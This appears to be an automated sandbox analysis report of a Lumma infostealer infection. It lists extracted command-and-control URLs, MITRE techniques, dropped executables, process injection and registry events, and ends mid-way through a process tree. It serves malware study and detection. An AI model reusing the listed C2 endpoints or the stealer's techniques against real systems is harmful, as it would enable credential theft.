lumma | hxxps://youtube[.]com

Resubmissions

16-01-2025 16:52

250116-vdsk9azkbz 4

10-01-2025 23:03

03-01-2025 12:00

31-12-2024 13:41

31-12-2024 13:34

31-12-2024 12:13

30-12-2024 19:05

Analysis

max time kernel
241s
max time network
241s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20241211-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20241211-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
31-12-2024 12:13

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://youtube.com

Score

10^/10

lumma discovery execution phishing stealer

Malware Config

Extracted

Family

lumma

https://cloudewahsj.shop/api

https://rabidcowse.shop/api

https://noisycuttej.shop/api

https://tirepublicerj.shop/api

https://framekgirus.shop/api

https://wholersorie.shop/api

https://abruptyopsn.shop/api

https://nearycrepso.shop/api

Extracted

Family

lumma

https://abruptyopsn.shop/api

https://wholersorie.shop/api

https://framekgirus.shop/api

https://tirepublicerj.shop/api

https://noisycuttej.shop/api

https://rabidcowse.shop/api

https://cloudewahsj.shop/api

Signatures

Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
Lumma family
lumma

Blocklisted process makes network request 1 IoCs

flow	pid	Process
305	2052	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2052	powershell.exe

Downloads MZ/PE file
A potential corporate email address has been identified in the URL: [email protected]
phishing
A potential corporate email address has been identified in the URL: [email protected]
phishing
A potential corporate email address has been identified in the URL: [email protected]
phishing
A potential corporate email address has been identified in the URL: [email protected]
phishing

Executes dropped EXE 1 IoCs

pid	Process
324	installer.exe

Loads dropped DLL 1 IoCs

pid	Process
324	installer.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2052 set thread context of 1180	2052	powershell.exe	127

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SystemTemp	chrome.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Program crash 1 IoCs

pid	pid_target	Process	procid_target
3836	324	WerFault.exe	116

System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	installer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133801208441488009"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe

Modifies registry class 64 IoCs

description	ioc	Process
Set value (data)	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\NodeSlot = "7"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\MRUListEx = 00000000ffffffff	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2 = 3a001f44471a0359723fa74489c55595fe6b30ee260001002600efbe10000000ab045648dd4bdb010cd42c0de64bdb01b38dd3ca7d5bdb0114000000	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 020000000100000000000000ffffffff	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\IconSize = "48"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupView = "0"	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 010000000200000000000000ffffffff	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:PID = "14"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 010000000200000000000000ffffffff	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	chrome.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-114766061-2901990051-2372745435-1000\{51F409CC-6AF5-4975-B7E1-B99470DE9E28}	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell\SniffedFolderType = "Generic"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\KnownFolderDerivedFolderType = "{885A186E-A440-4ADA-812B-DB871B942259}"	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\SniffedFolderType = "Downloads"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\LogicalViewMode = "1"	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell\SniffedFolderType = "Generic"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202020202	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	chrome.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\MRUListEx = ffffffff	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\Mode = "1"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a000000a000000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 = 14002e8005398e082303024b98265d99428e115f0000	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByDirection = "1"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\FFlags = "1"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616257"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupView = "4294967295"	chrome.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Mode = "4"	chrome.exe

Suspicious behavior: EnumeratesProcesses 9 IoCs

pid	Process
2352	chrome.exe
2352	chrome.exe
2052	powershell.exe
2052	powershell.exe
4884	chrome.exe
4884	chrome.exe
2052	powershell.exe
4884	chrome.exe
4884	chrome.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
412	chrome.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 12 IoCs

pid	Process
2352	chrome.exe
2352	chrome.exe
2352	chrome.exe
2352	chrome.exe
2352	chrome.exe
2352	chrome.exe
2352	chrome.exe
2352	chrome.exe
2352	chrome.exe
2352	chrome.exe
2352	chrome.exe
2352	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	2352	chrome.exe
Token: SeCreatePagefilePrivilege	2352	chrome.exe
Token: SeShutdownPrivilege	2352	chrome.exe
Token: SeCreatePagefilePrivilege	2352	chrome.exe
Token: SeShutdownPrivilege	2352	chrome.exe
Token: SeCreatePagefilePrivilege	2352	chrome.exe
Token: 33	4024	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	4024	AUDIODG.EXE
Token: SeShutdownPrivilege	2352	chrome.exe
Token: SeCreatePagefilePrivilege	2352	chrome.exe
Token: SeShutdownPrivilege	2352	chrome.exe
Token: SeCreatePagefilePrivilege	2352	chrome.exe
Token: SeShutdownPrivilege	2352	chrome.exe
Token: SeCreatePagefilePrivilege	2352	chrome.exe
Token: SeShutdownPrivilege	2352	chrome.exe
Token: SeCreatePagefilePrivilege	2352	chrome.exe
Token: SeShutdownPrivilege	2352	chrome.exe
Token: SeCreatePagefilePrivilege	2352	chrome.exe
Token: SeShutdownPrivilege	2352	chrome.exe
Token: SeCreatePagefilePrivilege	2352	chrome.exe
Token: SeShutdownPrivilege	2352	chrome.exe
Token: SeCreatePagefilePrivilege	2352	chrome.exe
Token: SeShutdownPrivilege	2352	chrome.exe
Token: SeCreatePagefilePrivilege	2352	chrome.exe
Token: SeShutdownPrivilege	2352	chrome.exe
Token: SeCreatePagefilePrivilege	2352	chrome.exe
Token: SeShutdownPrivilege	2352	chrome.exe
Token: SeCreatePagefilePrivilege	2352	chrome.exe
Token: SeShutdownPrivilege	2352	chrome.exe
Token: SeCreatePagefilePrivilege	2352	chrome.exe
Token: SeShutdownPrivilege	2352	chrome.exe
Token: SeCreatePagefilePrivilege	2352	chrome.exe
Token: SeShutdownPrivilege	2352	chrome.exe
Token: SeCreatePagefilePrivilege	2352	chrome.exe
Token: SeShutdownPrivilege	2352	chrome.exe
Token: SeCreatePagefilePrivilege	2352	chrome.exe
Token: SeShutdownPrivilege	2352	chrome.exe
Token: SeCreatePagefilePrivilege	2352	chrome.exe
Token: SeShutdownPrivilege	2352	chrome.exe
Token: SeCreatePagefilePrivilege	2352	chrome.exe
Token: SeShutdownPrivilege	2352	chrome.exe
Token: SeCreatePagefilePrivilege	2352	chrome.exe
Token: SeShutdownPrivilege	2352	chrome.exe
Token: SeCreatePagefilePrivilege	2352	chrome.exe
Token: SeShutdownPrivilege	2352	chrome.exe
Token: SeCreatePagefilePrivilege	2352	chrome.exe
Token: SeShutdownPrivilege	2352	chrome.exe
Token: SeCreatePagefilePrivilege	2352	chrome.exe
Token: SeShutdownPrivilege	2352	chrome.exe
Token: SeCreatePagefilePrivilege	2352	chrome.exe
Token: SeShutdownPrivilege	2352	chrome.exe
Token: SeCreatePagefilePrivilege	2352	chrome.exe
Token: SeShutdownPrivilege	2352	chrome.exe
Token: SeCreatePagefilePrivilege	2352	chrome.exe
Token: SeShutdownPrivilege	2352	chrome.exe
Token: SeCreatePagefilePrivilege	2352	chrome.exe
Token: SeShutdownPrivilege	2352	chrome.exe
Token: SeCreatePagefilePrivilege	2352	chrome.exe
Token: SeShutdownPrivilege	2352	chrome.exe
Token: SeCreatePagefilePrivilege	2352	chrome.exe
Token: SeShutdownPrivilege	2352	chrome.exe
Token: SeCreatePagefilePrivilege	2352	chrome.exe
Token: SeShutdownPrivilege	2352	chrome.exe
Token: SeCreatePagefilePrivilege	2352	chrome.exe

Suspicious use of FindShellTrayWindow 50 IoCs

pid	Process
2352	chrome.exe
2352	chrome.exe
2352	chrome.exe
2352	chrome.exe
2352	chrome.exe
2352	chrome.exe
2352	chrome.exe
2352	chrome.exe
2352	chrome.exe
2352	chrome.exe
2352	chrome.exe
2352	chrome.exe
2352	chrome.exe
2352	chrome.exe
2352	chrome.exe
2352	chrome.exe
2352	chrome.exe
2352	chrome.exe
2352	chrome.exe
2352	chrome.exe
2352	chrome.exe
2352	chrome.exe
2352	chrome.exe
2352	chrome.exe
2352	chrome.exe
2352	chrome.exe
2352	chrome.exe
2352	chrome.exe
2352	chrome.exe
2352	chrome.exe
2352	chrome.exe
2352	chrome.exe
2352	chrome.exe
2352	chrome.exe
2352	chrome.exe
2352	chrome.exe
2352	chrome.exe
2352	chrome.exe
2352	chrome.exe
2352	chrome.exe
2352	chrome.exe
2352	chrome.exe
2352	chrome.exe
2352	chrome.exe
2352	chrome.exe
2352	chrome.exe
2352	chrome.exe
2352	chrome.exe
2352	chrome.exe
3584	7zG.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
2352	chrome.exe
2352	chrome.exe
2352	chrome.exe
2352	chrome.exe
2352	chrome.exe
2352	chrome.exe
2352	chrome.exe
2352	chrome.exe
2352	chrome.exe
2352	chrome.exe
2352	chrome.exe
2352	chrome.exe
2352	chrome.exe
2352	chrome.exe
2352	chrome.exe
2352	chrome.exe
2352	chrome.exe
2352	chrome.exe
2352	chrome.exe
2352	chrome.exe
2352	chrome.exe
2352	chrome.exe
2352	chrome.exe
2352	chrome.exe

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
324	installer.exe
324	installer.exe
324	installer.exe
412	chrome.exe
4424	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2352 wrote to memory of 3380	2352	chrome.exe	83
PID 2352 wrote to memory of 3380	2352	chrome.exe	83
PID 2352 wrote to memory of 1876	2352	chrome.exe	84
PID 2352 wrote to memory of 1876	2352	chrome.exe	84
PID 2352 wrote to memory of 1876	2352	chrome.exe	84
PID 2352 wrote to memory of 1876	2352	chrome.exe	84
PID 2352 wrote to memory of 1876	2352	chrome.exe	84
PID 2352 wrote to memory of 1876	2352	chrome.exe	84
PID 2352 wrote to memory of 1876	2352	chrome.exe	84
PID 2352 wrote to memory of 1876	2352	chrome.exe	84
PID 2352 wrote to memory of 1876	2352	chrome.exe	84
PID 2352 wrote to memory of 1876	2352	chrome.exe	84
PID 2352 wrote to memory of 1876	2352	chrome.exe	84
PID 2352 wrote to memory of 1876	2352	chrome.exe	84
PID 2352 wrote to memory of 1876	2352	chrome.exe	84
PID 2352 wrote to memory of 1876	2352	chrome.exe	84
PID 2352 wrote to memory of 1876	2352	chrome.exe	84
PID 2352 wrote to memory of 1876	2352	chrome.exe	84
PID 2352 wrote to memory of 1876	2352	chrome.exe	84
PID 2352 wrote to memory of 1876	2352	chrome.exe	84
PID 2352 wrote to memory of 1876	2352	chrome.exe	84
PID 2352 wrote to memory of 1876	2352	chrome.exe	84
PID 2352 wrote to memory of 1876	2352	chrome.exe	84
PID 2352 wrote to memory of 1876	2352	chrome.exe	84
PID 2352 wrote to memory of 1876	2352	chrome.exe	84
PID 2352 wrote to memory of 1876	2352	chrome.exe	84
PID 2352 wrote to memory of 1876	2352	chrome.exe	84
PID 2352 wrote to memory of 1876	2352	chrome.exe	84
PID 2352 wrote to memory of 1876	2352	chrome.exe	84
PID 2352 wrote to memory of 1876	2352	chrome.exe	84
PID 2352 wrote to memory of 1876	2352	chrome.exe	84
PID 2352 wrote to memory of 1876	2352	chrome.exe	84
PID 2352 wrote to memory of 2976	2352	chrome.exe	85
PID 2352 wrote to memory of 2976	2352	chrome.exe	85
PID 2352 wrote to memory of 228	2352	chrome.exe	86
PID 2352 wrote to memory of 228	2352	chrome.exe	86
PID 2352 wrote to memory of 228	2352	chrome.exe	86
PID 2352 wrote to memory of 228	2352	chrome.exe	86
PID 2352 wrote to memory of 228	2352	chrome.exe	86
PID 2352 wrote to memory of 228	2352	chrome.exe	86
PID 2352 wrote to memory of 228	2352	chrome.exe	86
PID 2352 wrote to memory of 228	2352	chrome.exe	86
PID 2352 wrote to memory of 228	2352	chrome.exe	86
PID 2352 wrote to memory of 228	2352	chrome.exe	86
PID 2352 wrote to memory of 228	2352	chrome.exe	86
PID 2352 wrote to memory of 228	2352	chrome.exe	86
PID 2352 wrote to memory of 228	2352	chrome.exe	86
PID 2352 wrote to memory of 228	2352	chrome.exe	86
PID 2352 wrote to memory of 228	2352	chrome.exe	86
PID 2352 wrote to memory of 228	2352	chrome.exe	86
PID 2352 wrote to memory of 228	2352	chrome.exe	86
PID 2352 wrote to memory of 228	2352	chrome.exe	86
PID 2352 wrote to memory of 228	2352	chrome.exe	86
PID 2352 wrote to memory of 228	2352	chrome.exe	86
PID 2352 wrote to memory of 228	2352	chrome.exe	86
PID 2352 wrote to memory of 228	2352	chrome.exe	86
PID 2352 wrote to memory of 228	2352	chrome.exe	86
PID 2352 wrote to memory of 228	2352	chrome.exe	86
PID 2352 wrote to memory of 228	2352	chrome.exe	86
PID 2352 wrote to memory of 228	2352	chrome.exe	86
PID 2352 wrote to memory of 228	2352	chrome.exe	86
PID 2352 wrote to memory of 228	2352	chrome.exe	86
PID 2352 wrote to memory of 228	2352	chrome.exe	86
PID 2352 wrote to memory of 228	2352	chrome.exe	86

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

cURL User-Agent 1 IoCs

Uses User-Agent string associated with cURL utility.

description	flow	ioc
HTTP User-Agent header	302	curl/8.7.1

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://youtube.com
1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2352
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x21c,0x220,0x224,0x1f8,0x228,0x7ffa03facc40,0x7ffa03facc4c,0x7ffa03facc58
  2⤵
  PID:3380
- C:\Program Files\Google\Chrome\Application\chrome.exe
